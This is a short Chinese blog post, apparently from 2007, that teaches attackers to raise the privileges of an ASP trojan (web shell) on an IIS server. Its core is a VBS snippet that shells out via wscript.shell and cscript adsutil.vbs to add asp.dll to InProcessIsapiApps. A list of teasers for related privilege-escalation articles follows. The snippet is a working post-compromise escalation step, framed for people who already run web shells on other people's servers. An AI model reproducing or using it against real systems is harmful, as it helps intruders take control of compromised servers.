ADSUTIL.VBS提权

原创 2007年09月13日 20:09:00
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下
========================================================
set wsh=createobject("wscript.shell") '创建一个wsh对象
a=wsh.run ("cmd.exe /c cscript.exe C:/Inetpub/AdminScripts/adsutil.vbs set /W3SVC/InProcessIsapiApps C:/WINNT/system32/inetsrv/httpext.dll C:/WINNT/system32/inetsrv/httpodbc.dll C:/WINNT/system32/inetsrv/ssinc.dll C:/WINNT/system32/msw3prt.dll C:/winnt/system32/inetsrv/asp.dll",0) '加入asp.dll到InProcessIsapiApps中
 

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...
  • yaofeiNO1
  • yaofeiNO1
  • 2017年03月17日 20:04
  • 1856

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一、 二、Windwos常见提权
  • u011781521
  • u011781521
  • 2017年03月29日 17:23
  • 3723

Linux提权:从入门到放弃

转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,...
  • earbao
  • earbao
  • 2017年03月23日 09:25
  • 4307

驱动实现win7下cmd提权

本驱动程序是Stoned Bootkit Framework中的一部分,修改部分code实现重启桌面后对cmd和记事本进行提权; 编译环境: WDK 7600.16385.0 测试方...
  • cqyczj
  • cqyczj
  • 2014年04月20日 14:51
  • 1209

ubuntu系统权限提权

catalog 0. 引言 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5....
  • ASIA_kobe
  • ASIA_kobe
  • 2015年10月16日 14:32
  • 1907

Windows提权的几种姿势

想象这种画面:你拿到了一台机器上Meterpreter会话了,然后你准备运行getsystem命令进行提权,但如果提权没有成功,你就准备认输了吗?只有懦夫才会认输。但是你不是,对吗?你是一个勇者!!!...
  • moonhillcity
  • moonhillcity
  • 2016年10月20日 16:35
  • 7162

Linux系统提权思路

渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版...
  • bnxf00000
  • bnxf00000
  • 2017年03月22日 11:22
  • 4501

windows程序提权方法

Windows下应用程序如果需要做一些系统管理或进程管理之类的工作,经常需要将本进程提权(获取权限令牌); 而通常windows下提权方法有两种,主要的方法是: 1)win32API——AdjustT...
  • sowhat_Ah
  • sowhat_Ah
  • 2015年02月04日 12:03
  • 17670

小白日记21:kali渗透测试之提权(一)--本地提权

本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更...
  • ZiXuanFY
  • ZiXuanFY
  • 2016年09月23日 15:44
  • 1350

提权常用DOS命令运用

1.运行环境cmd 窗口中运行这些命令2. DOS 命令2.1查看版本:ver2.2查看权限:whoami tangyuan-pc 只是用户,这的 lizi 是管理员权限(一般电脑上的叫:Admi...
  • u011033906
  • u011033906
  • 2017年01月14日 14:33
  • 1042
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章: ADSUTIL.VBS提权
举报原因:
原因补充:

(最多只允许输入30个字)